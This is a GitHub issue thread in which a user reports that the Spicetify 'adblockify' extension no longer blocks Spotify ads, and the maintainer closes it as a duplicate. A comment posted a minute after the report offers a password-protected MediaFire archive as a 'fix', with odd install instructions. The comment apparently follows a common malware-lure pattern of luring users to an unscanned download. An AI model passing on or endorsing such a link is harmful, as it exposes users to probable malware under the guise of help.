### ISSUE TITLE
bug: adblockify extension didn't work, there are still ads running

### ISSUE THREAD

**Issue by vanity115** [rxri/spicetify-extensions#22] opened 2024-08-27 02:18 UTC
🔍 Is there already an issue for your problem?
 I have checked older issues, open and closed
ℹ Environment / Computer Info
- Spotify version:Spotify for Windows (64 bit) 1.2.44.405.g81fd6352
- Spicetify version:Spicetify v2.37.4
📦 Extension name
adblockify

📝 Description
the extension didn't work anymore. already tried to reinstall the extension and spicetify. there are still ads running on the ui and between songs, and ad popups.

📸 Screenshots
No response

**Comment by jia6214876** [comment] 2024-08-27 02:19
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rxri** [comment] 2024-08-27 02:22
Duplicate of #21

**Closed by rxri** 2024-08-27 02:23 UTC
Labels: bug
